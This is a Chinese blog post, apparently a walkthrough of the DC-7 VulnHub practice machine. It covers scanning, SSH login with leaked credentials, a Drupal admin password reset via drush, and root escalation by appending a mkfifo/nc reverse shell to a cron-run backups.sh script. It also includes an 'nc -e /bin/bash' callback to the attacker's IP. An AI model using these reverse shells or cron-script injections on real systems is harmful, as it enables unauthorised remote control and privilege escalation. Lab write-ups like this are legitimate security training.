当前位置:网站首页>DC-7-vulnhub
DC-7-vulnhub
2022-07-31 10:00:00 【逆风/】
靶机:http://www.five86.com/downloads/DC-7.zip
网络模式:NAT
arp-scan -l
192.168.194.167
nmap -p- -A 192.168.194.167
22/tcp open ssh
80/tcp open http
在下面
在代码config.php中找到一个账号密码
$username = “dc7user”;
$password = “MdR3xOgB7#dW”;
在robots.txt中,发现登录界面路径
用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以
查看mbox
虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,参考
cat /opt/scripts/backups.sh
www-data 具有权限,需要获取相应shell,再利用backups.sh提权
drush 命令可以修改密码
drush user-password admin --password="123456"
登录网站
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
折叠查找更快
可以写php文件了
路径为首页
提权
nc -e /bin/bash 192.168.194.156 7777
nc -lvvp 7777
利用backups.sh文件提权
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh
另一个终端监听
通过邮件的时间可以得知该脚本每15分钟执行一次
边栏推荐
猜你喜欢
随机推荐
通过栗子来学习MySQL高级知识点(学习,复习,面试都可)
loadrunner-controller-场景执行run
loadrunner脚本--添加集合点
Flink1.15 source code reading flink-clients - flink command line help command
乐观锁和悲观锁
js radar chart statistical chart plugin
Kotlin—基本语法 (五)
qt pass custom structure parameters in different threads
【微信小程序开发】生命周期与生命周期函数
Flink1.15 source code reading - PER_JOB vs APPLICATION execution process
浏览器使用占比js雷达图
A Spark SQL online problem troubleshooting and positioning
Scala basics [seq, set, map, tuple, WordCount, queue, parallel]
js右侧圆点单页滚动介绍页面
如何优雅的停止一个线程?
Mybaits Frequently Asked Questions Explained
Are postgresql range queries faster than index queries?
踩水坑2 数据超出long long
解决rpc error: code = Unimplemented desc = method CheckLicense not implemented
湖仓一体电商项目(二):项目使用技术及版本和基础环境准备